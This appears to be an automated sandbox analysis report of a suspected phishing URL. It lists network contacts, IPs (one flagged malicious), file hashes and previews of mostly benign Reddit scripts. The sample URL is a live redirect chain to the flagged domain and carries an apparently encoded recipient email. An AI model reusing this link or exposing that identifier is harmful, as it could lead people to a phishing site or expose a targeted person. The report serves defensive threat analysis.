                                                  https://urldefense.proofpoint.com/v2/url?u=https-3A__1.coisna.com_&d=DwMFAg&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH&m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J&s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54&e=false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/shreddit-player-2-c1d75db3.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/follow-button-6c9f957a.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/flex-nav-2ca2e7d8.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/reddit-recent-pages-c0f7b0df.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/select-controller-fa3db659.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/comment-6e87a634.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://v.redd.it/r8xshhw8ldwe1/DASH_96.mp4false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/base-translator-b41f5754.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://external-preview.redd.it/new-oscars-rule-if-you-dont-see-all-the-nominated-films-you-v0-cmKiQRTdAG60tRvxu0TW4Zn5IR8liBQippjgcfwwgPc.jpg?width=320&crop=smart&auto=webp&s=b91a6267ef92527b98a4fb7cc6ea3e8e2e1e7735false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://w3-reporting.reddit.com/policyfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/screen-reader-alert-outlet-709e38dd.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://preview.redd.it/aio-for-demanding-to-be-paid-after-wearing-something-v0-p3d0wjur1bwe1.jpg?width=1080&crop=smart&auto=webp&s=709b446b98d66153e1035e0509f9a80443313559false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/google-api-d2fdd9a3.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/google-one-tap-client-js-83d9ed1e.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/alert-controller-client-js-d21c2f4c.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/number-68db534b.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/viral-community-client-js-4ec0c36b.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://emoji.redditmedia.com/otf6hliftw5d1_t5_2qp7h/discordfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/mod-removal-reason-form-client-js-60fb2451.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/subreddit-posting-eligibility-cf0ca862.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/faceplate-dropdown-menu-f991e0ba.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://alb.reddit.com/i.gif?za=9wK-CFOU7QjxkSNFKq6hjSLN3UlU_SlB4YaLjg0skm5UJzbwPUITopaRkomX6XYatxkN66Lz-Osx-RvAaLXDWtR4kppcowit64cI9uoTejfmsrJCgWFhzlN7u5F0zuceAgjege82sxWyPTYptp5oAMSwUDz4DmHnfORX5CDZNLBvvtb2KRTj47opjr_zohKB4UTnKBxr5r8iPHGEELeLYYgtC-56UWBPl-URVLPZR5JVNX_YNMe3PK-JW9nFqC9O36h0m4By_k_EvrPxr_9pSMUeOZYW0_Ap99rO_SrDhz8YHLIxu1WNcDDRVFQJ6dcHLsnD4x0xmQLuB7rmjTL5ODUuVsHfjThIxQTuQt9OvwvJSYFCCpLOBlBBH2D3-eyfyvJKmY-CkHRftONNJMD5y8g-N1LB27NjJ_4oIVxv7R40sfAK5Iarb5TVQG0h5jUFl7ES8D08Yp25uQ&zp=dUyFM7SX6w2VFnNJxlNG6peJXK_1whHay09v5NE86Vazpp2OMD1mlx7DbQ0WB54LVDUKj8NvItTQFtfdXyuTLZbfbSmlpfMKUL7QsPYaV8cGDCjaAFAWRIdneW2vnQ&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344528742&t=1745344528742&o=0&q=0&h=725&w=620&sh=1024&sw=1280&va=1&vb=0&vc=0&vd=0&ve=0&vg=0&vh=0&vi=0&vs=0&vt=0&vu=0&vv=0&vx=0&vw=0&vq=0&vr=0&vy=0&xe=0&vz=0&xa=0&xf=0&xb=0&vf=0&xc=0false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/base-562ac292.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/faceplate-progress-9c742d06.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/compact-post-community-recommendations-client-js-8648402c.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/guides-224224e6.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/index-56e4320e.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.redditstatic.com/shreddit/en-US/popular-feed-client-js-5048ccd1.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.69.4
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.68.110
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  1.1.1.1
                                                  unknownAustralia
                                                  13335CLOUDFLARENETUSfalse
                                                  74.125.137.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  54.162.107.172
                                                  baconredirects-elb-1w79jy7i6g0wf-1154668140.us-east-1.elb.amazonaws.comUnited States
                                                  14618AMAZON-AESUSfalse
                                                  192.178.49.164
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.72.138
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  192.178.49.196
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  35.244.154.8
                                                  id.rlcdn.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.251.2.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  151.101.1.140
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  142.250.68.227
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  151.101.193.140
                                                  dualstack.reddit.map.fastly.netUnited States
                                                  54113FASTLYUSfalse
                                                  151.101.65.140
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  44.241.220.131
                                                  urldefense.comUnited States
                                                  16509AMAZON-02USfalse
                                                  151.101.129.140
                                                  reddit.map.fastly.netUnited States
                                                  54113FASTLYUSfalse
                                                  104.22.4.65
                                                  ad-delivery.netUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.67.11.120
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.233.43.104
                                                  1.coisna.comUnited States
                                                  20940AKAMAI-ASN1EUtrue
                                                  142.250.72.163
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  IP
                                                  192.168.2.16
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1671334
                                                  Start date and time:2025-04-22 19:54:34 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Sample URL:https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J%26s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54%26e=%23bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcN/1/010001965e9c7861-e810a570-973d-44ca-98b2-c8b768844478-000000/jtJ9ZQweb9qzOLXcWoJ9KSFZOxc=423
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal52.phis.win@24/300@64/70
                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.68.227, 142.250.68.110, 142.251.2.84, 142.250.69.14
                                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: https://yhp1b2pb.r.us-east-1.awstrack.me/L0/https:%2F%2Furldefense.proofpoint.com%2Fv2%2Furl%3Fu=https-3A__1.coisna.com_%26d=DwMFAg%26c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM%26r=UVtpy5T_qzGlA-mv7CbieWWT8nFVdnAvi1yRDJVubnst7YjM842-7ZZ-5lAAVWEH%26m=qKxTb-L2u14axGbH1UmxEo4PNW7X1T6OObvCWnDOht4KLszTa1uIXZy28f5Yoo2J%26s=uwc5jGTLUXsQprsVFZxaO8mqbr6FVRrkkt_8-S8Ff54%26e=%23bWljaGFlbC50b21vckB0YW1wYW11c2V1bS5vcmcN/1/010001965e9c7861-e810a570-973d-44ca-98b2-c8b768844478-000000/jtJ9ZQweb9qzOLXcWoJ9KSFZOxc=423
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x640, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):11852
                                                  Entropy (8bit):7.985527933377998
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C779088A2437C8E82332D4E77C62C0DB
                                                  SHA1:3116B5744E1A1F44ADDFBFB3B0EBE39282ABE26E
                                                  SHA-256:D100002A07E84133D4DD594C618F02A6B407C4213F0D444EBC8D7A85BBB4D815
                                                  SHA-512:0CBFB2D4E4D8B3EB567061B2AE294008EB935C500AD5507F03DA8FB4F3FCA970B191E404AE7AD334568C30B3D6B243BF3DF4BED923C2C270F8629FC4CFB43EE1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/this-dude-flying-in-a-jet-powered-wingsuit-right-next-to-v0-dzh2aW00NHhjZHdlMX9ZHEjl_kA6jpIN7Jjh6YhexHlQWfYdTa5nVe2ZUGgD.png?width=640&crop=smart&format=pjpg&auto=webp&s=ac2101f1fa921252010609c06f16c41fec88323d
                                                  Preview:RIFFD...WEBPVP8 8...0R...*....>Q&.F....!px....in.<..5...j.u;..T..~.N.E.,....].z.x...Z.'.{.0.(.o..4.85i....C..;.R*.V......&z.t....t..*..#..q/......o.>g.c9".......x...peQ..R..........i%>`.y.?.c..%NS~...g.(G...Uxap0xk{2.}b.Va..X.x.{+..P};..&....D.Z..z_..Dn..>..X.y....F4............X...h..p.L.zj.!.....8.....A.........E%..L..^.y..P.<.$@......`....J.?..*.Ou.~......o\.>.N.#..+...."e#.+.X....'_.o...8`...{.;J....:...?Zb.<.!.7..Vm.\...~.F...R%.gB-ZL.%!.H......x...zQ.cn.....U.3.D...'......ezS....Nj.C.s.....1dzc/.}.].@.../h.O=.Y..N4.h....dG......_O~.O.....d.)....m]...e..\_M8L....a.....,.h<.[.u..4.%D.].V....eA?..%:U..=.....f.\.)..QvTc....m.....R.....-......?D.. ..-..r.w<..F...2.K!._.?..)z.6:Q...f...}..,.(<d........C(...QDy.e.b.9..3........}.WU..Q......:....W.c.o!.x.q.).Pn....bs}.<.V/|.46.S.F....,c......L.X...Q.i..^.&W....z0>..nK7cDOW...pX..y.\%f..f1.`.=9gC.@4....48eE.=<P..5..p.[t..P..y)6...N..w.=...7U..x.......>....:H....&..B.f,..6..*..h..@'...sf...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4427)
                                                  Category:downloaded
                                                  Size (bytes):4494
                                                  Entropy (8bit):5.117716353859901
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:65BA05B0F2CFF7364576F1A7EA1DB6A2
                                                  SHA1:414786A5C044AFF080B63527A371F78000BCAFCA
                                                  SHA-256:B4E29D66AB05BDE9AD10C76DDF4268D527EFCE30D0553A9FD3ADDE667747C31C
                                                  SHA-512:BEA9F56A948B14877B68765BFCAD7E587644F60C34ACE33697FFA5F7C94D5C6CB90735489CCE632648FA1149B305BC1C36257E21904B909B49609B85BB8998D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/banned-user-banner-client-js-feaea128.js
                                                  Preview:import{c as n,x as t,s as e,a}from"./icon-4d9be652.js";import{u as i,_ as r,g as o,n as s,I as c,am as l,a3 as d,e as p}from"./shell-4994f581.js";const u={plain:"plain",plainInverted:"plainInverted",error:"error",brand:"brand",caution:"caution",success:"success"},b={plain:"plain",plainInverted:"plainInverted",error:"destructive",brand:"brand",caution:"plain",success:"success"};let g=class extends e{constructor(){super(...arguments),this.multiLine=!1,this.appearance="plain",this.shape="rounded",this.msg="",this.rafId=null,this.onTextContainerResize=(n,t)=>{this.rafId&&cancelAnimationFrame(this.rafId),this.rafId=requestAnimationFrame((()=>{if(!(this.actionButtons.length&&this.textContainer&&this.bannerText&&this.actionButtonContainer))return;const e=this.textContainer.getBoundingClientRect().width>this.bannerText.getBoundingClientRect().width+this.actionButtonContainer.getBoundingClientRect().width,a=2.5*t;for(const t of n){const n=t.contentRect.height>=a;this.multiLine&&e&&!n?this.multi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2579)
                                                  Category:downloaded
                                                  Size (bytes):2650
                                                  Entropy (8bit):5.038109213418375
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B7700AD3A4D04C37D7C8510C7755A4A3
                                                  SHA1:0D137C105555DBDFD778AB8C8EAC55F1CA9AFA0A
                                                  SHA-256:A69E00665C22360401BAD93452EEF5B51C96EEC4ECD5D131FEDC67B2F5407F0D
                                                  SHA-512:B850D878DBC26F5ED0246BC043D895CF50BD56423FB4986ADCFD27DD0B689E67F9E6E1EC044A70C9D1455EBF798FD54E4314B5430306C4668C716092E02D9AD3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/start-end-ama-actions-controller-5384925e.js
                                                  Preview:import{O as t,K as s,T as e,c as a,H as n,aM as o}from"./shell-4994f581.js";import{A as h}from"./links-27a3f3ef.js";import{P as i}from"./overflow-menu-actions-fd509c7d.js";let r=s;function d(t){return t?.[0]?.message??"Something went wrong"}class u{constructor(t){this.handleAMAStarted=async({startsAt:t,endsAt:s})=>{this.updateSchedule(t,s),this.host.amaState=h.Live},this.handleAMAEnded=async()=>{this.updateSchedule(this.host.startsAt,new Date),this.host.amaState=h.Ended},this.handleClick=async(t=!1)=>{const s=this.host.amaState===h.Scheduled?"start":"end";!t&&"start"===s&&this.host.startsAt>new Date(Date.now()+6e5)?this.host.pubsub.publish(e.AMATryStartEarly):await this.updateAmaSchedule(s)},this.updateAmaSchedule=async t=>{if("end"===t)this.host.pubsub.publish(e.AMATryEnd);else{const t=new Date,s=this.host.endsAt;try{const a=await this._updateEventTimeMutation({postId:this.host.postId,event:{startsAt:t.toISOString(),endsAt:s.toISOString()}});this.host.pubsub.publish(e.AMAStarted,a)}ca
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):2226
                                                  Entropy (8bit):6.861820507859755
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C22A0852D2AA33FC9789A27A505641F7
                                                  SHA1:3CCE4356CAA66CA326FA6E9BC2754E455165E23B
                                                  SHA-256:41F4FAAEFD4ABBB806CB8924BDE7C193455C751FF495224D15A55CBBBFD44276
                                                  SHA-512:83DCAC2937DF241A0C5233DC3B96ED11726729EE8DB8DB8230734030699E89BAB64B6E6D71F2778EE5E22536FCE17B2B6EE875648CC423D16AB653CB394ECC9C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/otf6hliftw5d1_t5_2qp7h/discord
                                                  Preview:.PNG........IHDR...P...P.............sRGB...,.....pHYs...a...a..?.i....PLTE...Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe.Qe..6_=....tRNS..$Gv.D,.|N+..;u.......}E..?....7...T......... 389-!.....Y..]................k..I..t."J.P.m..l..Oz.....:.*X....)4a......=.....d..S.n.sq.%.._..H(.'..MxC.\...c.j.w.p.f...>.W.`#g.~0...R....6.Z.F..5...L<bAC.%C....IDATx...PTU...!T.....&u.XvJ...._..c.%...Z.J
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1446)
                                                  Category:downloaded
                                                  Size (bytes):1492
                                                  Entropy (8bit):4.886621672589916
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E14A870F0B32F5C53AA6D543881D26EB
                                                  SHA1:1493422FAF657154B76DDF90397EB1251E6A6328
                                                  SHA-256:76DB6873481085E93E9DAEC1DFF77B6CD15E6F7BD512D5AB5EEFA34C3DCF7B3F
                                                  SHA-512:8F463517F26BF26171D3190D11F0CF15405573C1C82BDAC5B866CEA876EDEBD82F886294711124A16D9828CC6B3FD1B54484873D10FFF81329516DFD87BC63D9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/comment-6e87a634.js
                                                  Preview:import{M as i,A as o}from"./distinguished-tags-28b29a34.js";var e;!function(i){i.addRemovalReason="add_removal_reason",i.distinguishAsMod="distinguish_as_mod",i.distinguishAsAdmin="distinguish_as_admin",i.sticky="sticky",i.lock="lock",i.approve="approve",i.remove="remove",i.removeAsSpam="remove_as_spam",i.confirmRemoval="confirm_removal",i.approveOptimistic="approve_optimistic",i.removeOptimistic="remove_optimistic",i.removeAsSpamOptimistic="remove_as_spam_optimistic",i.confirmRemovalOptimistic="confirm_removal_optimistic",i.ignoreReports="ignore_reports",i.edit="edit",i.snoozeReporter="snooze_reporter",i.unsnoozeReporter="unsnooze_reporter"}(e||(e={}));const s={[i.Distinguish]:e.distinguishAsMod,[i.Undistinguish]:e.distinguishAsMod,[i.Lock]:e.lock,[i.Unlock]:e.lock,[i.Sticky]:e.sticky,[i.Unsticky]:e.sticky,[i.AddRemovalReason]:e.addRemovalReason,[i.ApproveContent]:e.approve,[i.RemoveContent]:e.remove,[i.RemoveContentAsSpam]:e.removeAsSpam,[i.ConfirmRemoval]:e.confirmRemoval,[i.IgnoreR
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x1137, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):213902
                                                  Entropy (8bit):7.9991026911114655
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:A0AB4B6905E9CB1D9E2D4C6F84AE0BA5
                                                  SHA1:70C0363063857EA3B7F3E14D7664E4BF3DC1F294
                                                  SHA-256:1094AE34FA1D70B78DF0F4A486CF718F9F335F5E976CC1A9D1E70DB01566AB2C
                                                  SHA-512:127050AA2816EC22BC08FF6E9B7B8E94E896592F00B6B5A04796B28DEC9F5E9D37B3014A99C9277537FBE93C01171DF03F7A5B6F29E8F6455C5824982666FB67
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/someone-found-this-awesome-mini-world-inside-a-tree-while-v0-Y3oydXNrY2o5ZXdlMfix98AlLO_iyTaOJ2u1luds-G8NQwgaL5-12Qab8lUN.png?width=640&crop=smart&format=pjpg&auto=webp&s=7070f7b90d51708b582792227af4ae2a1ddcadc1
                                                  Preview:RIFF.C..WEBPVP8 zC..0....*..q.>M..D"......(...e.k.(.Vgy.....c...o..~_......?..:...o.?......?..+...+.?{...O.._....C...?...?....m.._........#..........~...g...Mk...G..y...D......P.#...O.........;.g.o............+.S.....;..~......7.O....#...SoosP...s...<=....r...?.G...6.....oe....;...\;W.y.;....f.a.....A.....Yt.nT}>..E.+....\...iG(.Of~...wD./.......i.I...Q..k.vR...s........YT.i../..3.eZ. .[.....jZ{.R.jy.[.;..;!. ...#..b...fR"5x......m.Bl../B..X..X..I....._%i.9.i.S.u.w..3.Z..0.k...gg.......Z5..zF.-...Z.V..).r..;.yo....1Y....IL....0xDY&.*v...m.6!..P..M.....@.o..[.Gv..%.g.9I.Mzg|.v..)...|....$+..P.u..l..&.Q)2....E.3..J.%.IP.....l..;...?:t1....4`......+..P\...........T..b..0}H..[..m...e.^.;..E.d.vj..O.n...........~.....E..i@.Bh.q..L....3x....}..k..9.A....=.wC.....e%..v.FR.V.....Z~.mT/.GS.J...KL.4...S=.ibk.X.}.$:mj.Ne.k/.1.W:.....m....(,e.hd=.N..Aeq..Z.6Z..//.a:.B.[C....-B...P;....L..|....l......E....aK(n.hI..M}.O.M.Y....."...;....j\9....:+.O....7sT.#w
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3987)
                                                  Category:downloaded
                                                  Size (bytes):4038
                                                  Entropy (8bit):4.875083131889342
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:10F062C430354FE699DD8464C61B7675
                                                  SHA1:2EC7EF8A07997516FD55193F1554E05E0FF5D39F
                                                  SHA-256:EE1F58FFC2359AC3A054D06FC926BF09893EA279F0093112848D72DF1B436EE6
                                                  SHA-512:CEC70FE6E7B6648467391F23D9DF9C4BB3F92881AD1AE2C8C9069A2653074876692E4134B768F7E88B9CA02714017E106EDA70D0D2460FD6363BF3941CC93DCB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/translations-13fc818b.js
                                                  Preview:import{b as t}from"./shell-4994f581.js";var o;!function(t){t.ACCOUNT_AGE="account_age",t.BACKEND="backend",t.DEFAULT_OFF="default_off",t.REGULAR_SEO="regular_seo",t.MT_SEO="mt_seo"}(o||(o={}));const n=o=>t({source:"translate_button",action:"view",noun:"comment_composer"},{action_info:{reason:"on"},...o?{comment:{id:o}}:{}}),s=(o,n)=>t({source:"translate_button",action:"click",noun:"comment_composer"},{action_info:{reason:o?"on":"off"},...n?{comment:{id:n}}:{}}),a=(o,n,s)=>t({source:"translate_button",action:"submit",noun:"comment_composer"},{action_info:{reason:o?"on":"off"},...n?{post:{id:n.id,language:n.postLanguage,subreddit_id:n.subredditId,subreddit_name:n.subredditPrefixedName,type:n.postType,url:n.permalink}}:{},...s?{comment:{id:s}}:{}}),e=()=>t({source:"translate_button",action:"hide",noun:"comment_composer"}),i=o=>t({source:"translate_button",action:"view",noun:"post_composer"},{action_info:{reason:"on"},...o?{post:{id:o}}:{}}),r=(o,n)=>t({source:"translate_button",action:"cl
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (15703)
                                                  Category:downloaded
                                                  Size (bytes):15774
                                                  Entropy (8bit):5.279864533396469
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F331CE9FE5A02FE15F0B6A5FA72FA12D
                                                  SHA1:C3B069C85890F56F10B6757C536FF9D0736B5A6F
                                                  SHA-256:935E693077E54EEEEDA96AE179CE07C0E9AEC786AD6FC19770D218B8BF43E6E2
                                                  SHA-512:2DC3F8B67FAE84FA62BA16E7AD9AA4A48B085607447AC1DC5D56F496366C0C6729C753FF47ECC5E67C14CCC72DFF0EE97DF0A14D2B2CA0F14ACDBD2983D0A80C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/hui-translation-button-client-js-d88f0399.js
                                                  Preview:import{a as t,c as e,H as a,u as i,v as s,t as n,_ as o,I as l,g as r,e as c,n as h,av as d,aw as p,l as u,L as m,ax as v,ao as k,K as b,x as g,ep as C,eq as x,O as f,er as T}from"./shell-4994f581.js";import{S as w}from"./faceplate-switch-input-14302c35.js";import{x as A,c as y,I as E,a as S,s as M,bt as D,bu as I,A as $}from"./icon-4d9be652.js";import{l as V,L as F}from"./expandable-section-header-e3f969c2.js";import{a as O,T as B}from"./faceplate-textarea-input-ab5075d8.js";import{j as R,k as N,l as G,T as j,m as z,n as _}from"./translations-13fc818b.js";import{t as U,c as L,d as P,e as q,f as Q,g as Y,h as K}from"./translation-8ca07c16.js";import"./helpers-ca93cf1a.js";import"./filterNullish-3e68f24c.js";import"./index-169ed00b.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./text-input-1c750feb.js";import"./links-27a3f3ef.js";var W;!function(t){t.GREAT="great",t.NOT_GREAT="not great"}(W||(W={}));let H=class extends(t(M)){constructor(){super(...arguments),this.ot
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (582)
                                                  Category:downloaded
                                                  Size (bytes):566986
                                                  Entropy (8bit):5.66396154363793
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:81C660D7B8F9AF9FFDC7F081F7523B76
                                                  SHA1:A5D4F4696A9AB31305F5361A51DB89713116FB38
                                                  SHA-256:7F111C147CE80DEA4059F205AE84936FCAE65FB971C09CADEAFB9993C28FC0D1
                                                  SHA-512:B2B22CE47736C406F02D17B023B626BE1877367C0514A512B645F94C7035C2903D46261DFC6E63FB372080EA11FED8236A3DCC509D48F715F59E9353F25644EC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.gstatic.com/recaptcha/releases/w0_qmZVSdoaCDsP7iM_WT86D/recaptcha__en.js
